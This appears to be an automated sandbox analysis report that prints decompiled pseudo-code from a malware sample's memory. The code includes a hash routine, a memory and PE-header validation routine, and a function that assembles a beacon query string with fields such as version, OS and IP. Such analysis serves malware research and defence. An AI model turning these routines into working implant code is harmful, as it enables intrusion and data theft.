                                                                                  				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                                                                                  				asm("rol esi, 0xf");
                                                                                  				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                                                                                  				asm("ror ecx, 0xb");
                                                                                  				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                                                                                  				asm("rol eax, 0x6");
                                                                                  				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                                                                                  				asm("rol edx, 0xa");
                                                                                  				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                                                                                  				asm("rol esi, 0xf");
                                                                                  				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                                                                                  				asm("ror ecx, 0xb");
                                                                                  				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                                                                                  				asm("rol eax, 0x6");
                                                                                  				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                                                                                  				asm("rol edx, 0xa");
                                                                                  				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                                                                                  				asm("rol esi, 0xf");
                                                                                  				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                                                                                  				asm("ror edi, 0xb");
                                                                                  				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                                                                                  				asm("rol eax, 0x6");
                                                                                  				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                                                                                  				asm("rol edx, 0xa");
                                                                                  				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                                                                                  				_t399 = _a4;
                                                                                  				asm("rol esi, 0xf");
                                                                                  				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                                                                                  				 *_t399 =  *_t399 + _t259;
                                                                                  				asm("ror eax, 0xb");
                                                                                  				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                                                                                  				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                                                                                  				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                                                                                  				return memset( &_v76, 0, 0x40);
                                                                                  			}


                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID:
                                                                                  • API String ID: 2221118986-0
                                                                                  • Opcode ID: 63541d09d44a16f12ea67eea49ab1383879bbcc9d20cb7b9c3abc084077f7095
                                                                                  • Instruction ID: aad35203a69e6e6d33e91efb97d0c7fed23f5fabba914e7b226a3c963d82b7f1
                                                                                  • Opcode Fuzzy Hash: 63541d09d44a16f12ea67eea49ab1383879bbcc9d20cb7b9c3abc084077f7095
                                                                                  • Instruction Fuzzy Hash: 4122747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033FB159(long _a4) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				signed int _v16;
                                                                                  				short* _v32;
                                                                                  				void _v36;
                                                                                  				void* _t57;
                                                                                  				signed int _t58;
                                                                                  				signed int _t61;
                                                                                  				signed int _t62;
                                                                                  				void* _t63;
                                                                                  				signed int* _t68;
                                                                                  				intOrPtr* _t69;
                                                                                  				intOrPtr* _t71;
                                                                                  				intOrPtr _t72;
                                                                                  				intOrPtr _t75;
                                                                                  				void* _t76;
                                                                                  				signed int _t77;
                                                                                  				void* _t78;
                                                                                  				void _t80;
                                                                                  				signed int _t81;
                                                                                  				signed int _t84;
                                                                                  				signed int _t86;
                                                                                  				short* _t87;
                                                                                  				void* _t89;
                                                                                  				signed int* _t90;
                                                                                  				long _t91;
                                                                                  				signed int _t93;
                                                                                  				signed int _t94;
                                                                                  				signed int _t100;
                                                                                  				signed int _t102;
                                                                                  				void* _t104;
                                                                                  				long _t108;
                                                                                  				signed int _t110;
                                                                                  
                                                                                  				_t108 = _a4;
                                                                                  				_t76 =  *(_t108 + 8);
                                                                                  				if((_t76 & 0x00000003) != 0) {
                                                                                  					L3:
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_a4 =  *[fs:0x4];
                                                                                  				_v8 =  *[fs:0x8];
                                                                                  				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                  					_t102 =  *(_t108 + 0xc);
                                                                                  					__eflags = _t102 - 0xffffffff;
                                                                                  					if(_t102 != 0xffffffff) {
                                                                                  						_t91 = 0;
                                                                                  						__eflags = 0;
                                                                                  						_a4 = 0;
                                                                                  						_t57 = _t76;
                                                                                  						do {
                                                                                  							_t80 =  *_t57;
                                                                                  							__eflags = _t80 - 0xffffffff;
                                                                                  							if(_t80 == 0xffffffff) {
                                                                                  								goto L9;
                                                                                  							}
                                                                                  							__eflags = _t80 - _t91;
                                                                                  							if(_t80 >= _t91) {
                                                                                  								L20:
                                                                                  								_t63 = 0;
                                                                                  								L60:
                                                                                  								return _t63;
                                                                                  							}
                                                                                  							L9:
                                                                                  							__eflags =  *(_t57 + 4);
                                                                                  							if( *(_t57 + 4) != 0) {
                                                                                  								_t12 =  &_a4;
                                                                                  								 *_t12 = _a4 + 1;
                                                                                  								__eflags =  *_t12;
                                                                                  							}
                                                                                  							_t91 = _t91 + 1;
                                                                                  							_t57 = _t57 + 0xc;
                                                                                  							__eflags = _t91 - _t102;
                                                                                  						} while (_t91 <= _t102);
                                                                                  						__eflags = _a4;
                                                                                  						if(_a4 == 0) {
                                                                                  							L15:
                                                                                  							_t81 =  *0x33fd290; // 0x0
                                                                                  							_t110 = _t76 & 0xfffff000;
                                                                                  							_t58 = 0;
                                                                                  							__eflags = _t81;
                                                                                  							if(_t81 <= 0) {
                                                                                  								L18:
                                                                                  								_t104 = _t102 | 0xffffffff;
                                                                                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                  								__eflags = _t61;
                                                                                  								if(_t61 < 0) {
                                                                                  									_t62 = 0;
                                                                                  									__eflags = 0;
                                                                                  								} else {
                                                                                  									_t62 = _a4;
                                                                                  								}
                                                                                  								__eflags = _t62;
                                                                                  								if(_t62 == 0) {
                                                                                  									L59:
                                                                                  									_t63 = _t104;
                                                                                  									goto L60;
                                                                                  								} else {
                                                                                  									__eflags = _v12 - 0x1000000;
                                                                                  									if(_v12 != 0x1000000) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									__eflags = _v16 & 0x000000cc;
                                                                                  									if((_v16 & 0x000000cc) == 0) {
                                                                                  										L46:
                                                                                  										_t63 = 1;
                                                                                  										 *0x33fd2d8 = 1;
                                                                                  										__eflags =  *0x33fd2d8;
                                                                                  										if( *0x33fd2d8 != 0) {
                                                                                  											goto L60;
                                                                                  										}
                                                                                  										_t84 =  *0x33fd290; // 0x0
                                                                                  										__eflags = _t84;
                                                                                  										_t93 = _t84;
                                                                                  										if(_t84 <= 0) {
                                                                                  											L51:
                                                                                  											__eflags = _t93;
                                                                                  											if(_t93 != 0) {
                                                                                  												L58:
                                                                                  												 *0x33fd2d8 = 0;
                                                                                  												goto L5;
                                                                                  											}
                                                                                  											_t77 = 0xf;
                                                                                  											__eflags = _t84 - _t77;
                                                                                  											if(_t84 <= _t77) {
                                                                                  												_t77 = _t84;
                                                                                  											}
                                                                                  											_t94 = 0;
                                                                                  											__eflags = _t77;
                                                                                  											if(_t77 < 0) {
                                                                                  												L56:
                                                                                  												__eflags = _t84 - 0x10;
                                                                                  												if(_t84 < 0x10) {
                                                                                  													_t86 = _t84 + 1;
                                                                                  													__eflags = _t86;
                                                                                  													 *0x33fd290 = _t86;
                                                                                  												}
                                                                                  												goto L58;
                                                                                  											} else {
                                                                                  												do {
                                                                                  													_t68 = 0x33fd298 + _t94 * 4;
                                                                                  													_t94 = _t94 + 1;
                                                                                  													__eflags = _t94 - _t77;
                                                                                  													 *_t68 = _t110;
                                                                                  													_t110 =  *_t68;
                                                                                  												} while (_t94 <= _t77);
                                                                                  												goto L56;
                                                                                  											}
                                                                                  										}
                                                                                  										_t69 = 0x33fd294 + _t84 * 4;
                                                                                  										while(1) {
                                                                                  											__eflags =  *_t69 - _t110;
                                                                                  											if( *_t69 == _t110) {
                                                                                  												goto L51;
                                                                                  											}
                                                                                  											_t93 = _t93 - 1;
                                                                                  											_t69 = _t69 - 4;
                                                                                  											__eflags = _t93;
                                                                                  											if(_t93 > 0) {
                                                                                  												continue;
                                                                                  											}
                                                                                  											goto L51;
                                                                                  										}
                                                                                  										goto L51;
                                                                                  									}
                                                                                  									_t87 = _v32;
                                                                                  									__eflags =  *_t87 - 0x5a4d;
                                                                                  									if( *_t87 != 0x5a4d) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                  									__eflags =  *_t71 - 0x4550;
                                                                                  									if( *_t71 != 0x4550) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									_t78 = _t76 - _t87;
                                                                                  									__eflags =  *((short*)(_t71 + 6));
                                                                                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                  									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                  									__eflags = _t78 - _t72;
                                                                                  									if(_t78 < _t72) {
                                                                                  										goto L46;
                                                                                  									}
                                                                                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                  										goto L46;
                                                                                  									}
                                                                                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                  										goto L20;
                                                                                  									}
                                                                                  									goto L46;
                                                                                  								}
                                                                                  							} else {
                                                                                  								goto L16;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								L16:
                                                                                  								__eflags =  *((intOrPtr*)(0x33fd298 + _t58 * 4)) - _t110;
                                                                                  								if( *((intOrPtr*)(0x33fd298 + _t58 * 4)) == _t110) {
                                                                                  									break;
                                                                                  								}
                                                                                  								_t58 = _t58 + 1;
                                                                                  								__eflags = _t58 - _t81;
                                                                                  								if(_t58 < _t81) {
                                                                                  									continue;
                                                                                  								}
                                                                                  								goto L18;
                                                                                  							}
                                                                                  							__eflags = _t58;
                                                                                  							if(_t58 <= 0) {
                                                                                  								goto L5;
                                                                                  							}
                                                                                  							 *0x33fd2d8 = 1;
                                                                                  							__eflags =  *0x33fd2d8;
                                                                                  							if( *0x33fd2d8 != 0) {
                                                                                  								goto L5;
                                                                                  							}
                                                                                  							__eflags =  *((intOrPtr*)(0x33fd298 + _t58 * 4)) - _t110;
                                                                                  							if( *((intOrPtr*)(0x33fd298 + _t58 * 4)) == _t110) {
                                                                                  								L32:
                                                                                  								_t100 = 0;
                                                                                  								__eflags = _t58;
                                                                                  								if(_t58 < 0) {
                                                                                  									L34:
                                                                                  									 *0x33fd2d8 = 0;
                                                                                  									goto L5;
                                                                                  								} else {
                                                                                  									goto L33;
                                                                                  								}
                                                                                  								do {
                                                                                  									L33:
                                                                                  									_t90 = 0x33fd298 + _t100 * 4;
                                                                                  									_t100 = _t100 + 1;
                                                                                  									__eflags = _t100 - _t58;
                                                                                  									 *_t90 = _t110;
                                                                                  									_t110 =  *_t90;
                                                                                  								} while (_t100 <= _t58);
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							_t25 = _t81 - 1; // -1
                                                                                  							_t58 = _t25;
                                                                                  							__eflags = _t58;
                                                                                  							if(_t58 < 0) {
                                                                                  								L28:
                                                                                  								__eflags = _t81 - 0x10;
                                                                                  								if(_t81 < 0x10) {
                                                                                  									_t81 = _t81 + 1;
                                                                                  									__eflags = _t81;
                                                                                  									 *0x33fd290 = _t81;
                                                                                  								}
                                                                                  								_t28 = _t81 - 1; // 0x0
                                                                                  								_t58 = _t28;
                                                                                  								goto L32;
                                                                                  							} else {
                                                                                  								goto L25;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								L25:
                                                                                  								__eflags =  *((intOrPtr*)(0x33fd298 + _t58 * 4)) - _t110;
                                                                                  								if( *((intOrPtr*)(0x33fd298 + _t58 * 4)) == _t110) {
                                                                                  									break;
                                                                                  								}
                                                                                  								_t58 = _t58 - 1;
                                                                                  								__eflags = _t58;
                                                                                  								if(_t58 >= 0) {
                                                                                  									continue;
                                                                                  								}
                                                                                  								break;
                                                                                  							}
                                                                                  							__eflags = _t58;
                                                                                  							if(__eflags >= 0) {
                                                                                  								if(__eflags == 0) {
                                                                                  									goto L34;
                                                                                  								}
                                                                                  								goto L32;
                                                                                  							}
                                                                                  							goto L28;
                                                                                  						}
                                                                                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                  						__eflags = _t75 - _v8;
                                                                                  						if(_t75 < _v8) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						__eflags = _t75 - _t108;
                                                                                  						if(_t75 >= _t108) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						goto L15;
                                                                                  					}
                                                                                  					L5:
                                                                                  					_t63 = 1;
                                                                                  					goto L60;
                                                                                  				} else {
                                                                                  					goto L3;
                                                                                  				}
                                                                                  			}





































                                                                                  APIs
                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 033FB20A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: MemoryQueryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2850889275-0
                                                                                  • Opcode ID: 70ac8f7000da4547c5ee5408e2c3768b32c333056c9d283520a5c337137eba20
                                                                                  • Instruction ID: f49d435415c0caacc71cb618647f820abf976ccec4cec8e454dfd1ab21005979
                                                                                  • Opcode Fuzzy Hash: 70ac8f7000da4547c5ee5408e2c3768b32c333056c9d283520a5c337137eba20
                                                                                  • Instruction Fuzzy Hash: D161E8B4A50206EFDB19DF28CCC462DF3AAEB45354FEC8269D646CB298E770D941C780
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 71%
                                                                                  			E033FAF34(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v12;
                                                                                  				void* __ebp;
                                                                                  				signed int* _t43;
                                                                                  				char _t44;
                                                                                  				void* _t46;
                                                                                  				void* _t49;
                                                                                  				intOrPtr* _t53;
                                                                                  				void* _t54;
                                                                                  				void* _t65;
                                                                                  				long _t66;
                                                                                  				signed int* _t80;
                                                                                  				signed int* _t82;
                                                                                  				void* _t84;
                                                                                  				signed int _t86;
                                                                                  				void* _t89;
                                                                                  				void* _t95;
                                                                                  				void* _t96;
                                                                                  				void* _t99;
                                                                                  				void* _t106;
                                                                                  
                                                                                  				_t43 = _t84;
                                                                                  				_t65 = __ebx + 2;
                                                                                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                  				_t89 = _t95;
                                                                                  				_t96 = _t95 - 8;
                                                                                  				_push(_t65);
                                                                                  				_push(_t84);
                                                                                  				_push(_t89);
                                                                                  				asm("cld");
                                                                                  				_t66 = _a8;
                                                                                  				_t44 = _a4;
                                                                                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                  					_push(_t89);
                                                                                  					E033FB09F(_t66 + 0x10, _t66, 0xffffffff);
                                                                                  					_t46 = 1;
                                                                                  				} else {
                                                                                  					_v12 = _t44;
                                                                                  					_v8 = _a12;
                                                                                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                  					_t86 =  *(_t66 + 0xc);
                                                                                  					_t80 =  *(_t66 + 8);
                                                                                  					_t49 = E033FB159(_t66);
                                                                                  					_t99 = _t96 + 4;
                                                                                  					if(_t49 == 0) {
                                                                                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                  						goto L11;
                                                                                  					} else {
                                                                                  						while(_t86 != 0xffffffff) {
                                                                                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                  							if(_t53 == 0) {
                                                                                  								L8:
                                                                                  								_t80 =  *(_t66 + 8);
                                                                                  								_t86 = _t80[_t86 + _t86 * 2];
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_t54 =  *_t53();
                                                                                  								_t89 = _t89;
                                                                                  								_t86 = _t86;
                                                                                  								_t66 = _a8;
                                                                                  								_t55 = _t54;
                                                                                  								_t106 = _t54;
                                                                                  								if(_t106 == 0) {
                                                                                  									goto L8;
                                                                                  								} else {
                                                                                  									if(_t106 < 0) {
                                                                                  										_t46 = 0;
                                                                                  									} else {
                                                                                  										_t82 =  *(_t66 + 8);
                                                                                  										E033FB044(_t55, _t66);
                                                                                  										_t89 = _t66 + 0x10;
                                                                                  										E033FB09F(_t89, _t66, 0);
                                                                                  										_t99 = _t99 + 0xc;
                                                                                  										E033FB13B(_t82[2]);
                                                                                  										 *(_t66 + 0xc) =  *_t82;
                                                                                  										_t66 = 0;
                                                                                  										_t86 = 0;
                                                                                  										 *(_t82[2])(1);
                                                                                  										goto L8;
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  							goto L13;
                                                                                  						}
                                                                                  						L11:
                                                                                  						_t46 = 1;
                                                                                  					}
                                                                                  				}
                                                                                  				L13:
                                                                                  				return _t46;
                                                                                  			}
























                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                  • Instruction ID: 8f64dbc60573710c56c69e04504362ded0dd6d17dff83dc78786e0eca8dfb37a
                                                                                  • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                  • Instruction Fuzzy Hash: 302177B69043059FC714EF68CCC0967F7A5BF44350B498168DA5A9F245E734F915CBE0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 70%
                                                                                  			E033F6A9C(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                                                                                  				intOrPtr _v4;
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				void* _v24;
                                                                                  				intOrPtr _v40;
                                                                                  				void* __ecx;
                                                                                  				void* __edi;
                                                                                  				intOrPtr _t31;
                                                                                  				intOrPtr _t32;
                                                                                  				intOrPtr _t33;
                                                                                  				intOrPtr _t34;
                                                                                  				intOrPtr _t35;
                                                                                  				void* _t38;
                                                                                  				intOrPtr _t39;
                                                                                  				int _t42;
                                                                                  				void* _t43;
                                                                                  				intOrPtr _t44;
                                                                                  				intOrPtr _t48;
                                                                                  				intOrPtr _t52;
                                                                                  				intOrPtr _t55;
                                                                                  				intOrPtr _t56;
                                                                                  				intOrPtr _t62;
                                                                                  				intOrPtr _t66;
                                                                                  				intOrPtr* _t68;
                                                                                  				intOrPtr _t78;
                                                                                  				intOrPtr _t81;
                                                                                  				intOrPtr _t84;
                                                                                  				int _t87;
                                                                                  				intOrPtr _t88;
                                                                                  				int _t91;
                                                                                  				intOrPtr _t92;
                                                                                  				int _t95;
                                                                                  				void* _t98;
                                                                                  				void* _t99;
                                                                                  				void* _t103;
                                                                                  				intOrPtr _t105;
                                                                                  				long _t107;
                                                                                  				intOrPtr _t108;
                                                                                  				intOrPtr* _t109;
                                                                                  				long _t110;
                                                                                  				int _t111;
                                                                                  				void* _t112;
                                                                                  				void* _t113;
                                                                                  				void* _t114;
                                                                                  				void* _t115;
                                                                                  				void* _t117;
                                                                                  				void* _t118;
                                                                                  				void* _t120;
                                                                                  				void* _t121;
                                                                                  
                                                                                  				_t103 = __edx;
                                                                                  				_t110 = __eax;
                                                                                  				_v8 = 8;
                                                                                  				_t117 = RtlAllocateHeap( *0x33fd1f0, 0, 0x800);
                                                                                  				if(_t117 != 0) {
                                                                                  					if(_t110 == 0) {
                                                                                  						_t110 = GetTickCount();
                                                                                  					}
                                                                                  					_t31 =  *0x33fd018; // 0xd08e8e1d
                                                                                  					asm("bswap eax");
                                                                                  					_t32 =  *0x33fd014; // 0x5cb11ae7
                                                                                  					asm("bswap eax");
                                                                                  					_t33 =  *0x33fd010; // 0x15dc9586
                                                                                  					asm("bswap eax");
                                                                                  					_t34 =  *0x33fd00c; // 0x67522d90
                                                                                  					asm("bswap eax");
                                                                                  					_t35 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t2 = _t35 + 0x33fe622; // 0x74666f73
                                                                                  					_t111 = wsprintfA(_t117, _t2, 2, 0x3d144, _t34, _t33, _t32, _t31,  *0x33fd02c,  *0x33fd004, _t110);
                                                                                  					_t38 = E033F7C34();
                                                                                  					_t39 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t3 = _t39 + 0x33fe662; // 0x74707526
                                                                                  					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
                                                                                  					_t120 = _t118 + 0x38;
                                                                                  					_t112 = _t111 + _t42;
                                                                                  					if(_a12 != 0) {
                                                                                  						_t92 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t7 = _t92 + 0x33fe66d; // 0x732526
                                                                                  						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
                                                                                  						_t120 = _t120 + 0xc;
                                                                                  						_t112 = _t112 + _t95;
                                                                                  					}
                                                                                  					_t43 = E033F5728(_t99);
                                                                                  					_t44 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t9 = _t44 + 0x33fe38a; // 0x6d697426
                                                                                  					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
                                                                                  					_t48 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t11 = _t48 + 0x33fe33b; // 0x74636126
                                                                                  					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
                                                                                  					_t52 =  *0x33fd288; // 0x5f295b0
                                                                                  					_t121 = _t120 + 0x1c;
                                                                                  					if(_t52 != 0) {
                                                                                  						_t88 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t13 = _t88 + 0x33fe685; // 0x73797326
                                                                                  						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
                                                                                  						_t121 = _t121 + 0xc;
                                                                                  						_t114 = _t114 + _t91;
                                                                                  					}
                                                                                  					_t105 =  *0x33fd2dc; // 0x5f29630
                                                                                  					_a28 = E033F8A9B(0x33fd00a, _t105 + 4);
                                                                                  					_t55 =  *0x33fd278; // 0x5f295e0
                                                                                  					_t107 = 0;
                                                                                  					if(_t55 != 0) {
                                                                                  						_t84 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t16 = _t84 + 0x33fe8ea; // 0x3d736f26
                                                                                  						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
                                                                                  						_t121 = _t121 + 0xc;
                                                                                  						_t114 = _t114 + _t87;
                                                                                  					}
                                                                                  					_t56 =  *0x33fd274; // 0x0
                                                                                  					if(_t56 != _t107) {
                                                                                  						_t81 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t18 = _t81 + 0x33fe8c1; // 0x3d706926
                                                                                  						wsprintfA(_t114 + _t117, _t18, _t56);
                                                                                  					}
                                                                                  					if(_a28 != _t107) {
                                                                                  						_t98 = RtlAllocateHeap( *0x33fd1f0, _t107, 0x800);
                                                                                  						if(_t98 != _t107) {
                                                                                  							E033F7C61(GetTickCount());
                                                                                  							_t62 =  *0x33fd2dc; // 0x5f29630
                                                                                  							__imp__(_t62 + 0x40);
                                                                                  							asm("lock xadd [eax], ecx");
                                                                                  							_t66 =  *0x33fd2dc; // 0x5f29630
                                                                                  							__imp__(_t66 + 0x40);
                                                                                  							_t68 =  *0x33fd2dc; // 0x5f29630
                                                                                  							_t115 = E033F140D(1, _t103, _t117,  *_t68);
                                                                                  							asm("lock xadd [eax], ecx");
                                                                                  							if(_t115 != _t107) {
                                                                                  								StrTrimA(_t115, 0x33fc2c4);
                                                                                  								_push(_t115);
                                                                                  								_t108 = E033F74AF();
                                                                                  								_v4 = _t108;
                                                                                  								if(_t108 != 0) {
                                                                                  									 *_t115 = 0;
                                                                                  									__imp__(_t98, _a8);
                                                                                  									_t109 = __imp__;
                                                                                  									 *_t109(_t98, _t108);
                                                                                  									 *_t109(_t98, _t115);
                                                                                  									_t78 = E033F4644(0xffffffffffffffff, _t98, _v12, _v8);
                                                                                  									_v40 = _t78;
                                                                                  									if(_t78 != 0 && _t78 != 0x10d2) {
                                                                                  										E033F53A8();
                                                                                  									}
                                                                                  									HeapFree( *0x33fd1f0, 0, _v24);
                                                                                  								}
                                                                                  								HeapFree( *0x33fd1f0, 0, _t115);
                                                                                  								_t107 = 0;
                                                                                  							}
                                                                                  							HeapFree( *0x33fd1f0, _t107, _t98);
                                                                                  						}
                                                                                  						HeapFree( *0x33fd1f0, _t107, _a20);
                                                                                  					}
                                                                                  					HeapFree( *0x33fd1f0, _t107, _t117);
                                                                                  				}
                                                                                  				return _v16;
                                                                                  			}






















































                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 033F6ABA
                                                                                  • GetTickCount.KERNEL32 ref: 033F6ACE
                                                                                  • wsprintfA.USER32 ref: 033F6B1D
                                                                                  • wsprintfA.USER32 ref: 033F6B3A
                                                                                  • wsprintfA.USER32 ref: 033F6B5B
                                                                                  • wsprintfA.USER32 ref: 033F6B79
                                                                                  • wsprintfA.USER32 ref: 033F6B8E
                                                                                  • wsprintfA.USER32 ref: 033F6BAF
                                                                                  • wsprintfA.USER32 ref: 033F6BE9
                                                                                  • wsprintfA.USER32 ref: 033F6C09
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 033F6C24
                                                                                  • GetTickCount.KERNEL32 ref: 033F6C34
                                                                                  • RtlEnterCriticalSection.NTDLL(05F295F0), ref: 033F6C48
                                                                                  • RtlLeaveCriticalSection.NTDLL(05F295F0), ref: 033F6C66
                                                                                    • Part of subcall function 033F140D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F1438
                                                                                    • Part of subcall function 033F140D: lstrlen.KERNEL32(00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F1440
                                                                                    • Part of subcall function 033F140D: strcpy.NTDLL ref: 033F1457
                                                                                    • Part of subcall function 033F140D: lstrcat.KERNEL32(00000000,00000000), ref: 033F1462
                                                                                    • Part of subcall function 033F140D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,033F6C79,?,00000000,033F6C79,00000000,05F29630), ref: 033F147F
                                                                                  • StrTrimA.SHLWAPI(00000000,033FC2C4,00000000,05F29630), ref: 033F6C94
                                                                                    • Part of subcall function 033F74AF: lstrlen.KERNEL32(05F2887A,00000000,00000000,00000000,033F6CA0,00000000), ref: 033F74BF
                                                                                    • Part of subcall function 033F74AF: lstrlen.KERNEL32(?), ref: 033F74C7
                                                                                    • Part of subcall function 033F74AF: lstrcpy.KERNEL32(00000000,05F2887A), ref: 033F74DB
                                                                                    • Part of subcall function 033F74AF: lstrcat.KERNEL32(00000000,?), ref: 033F74E6
                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 033F6CB2
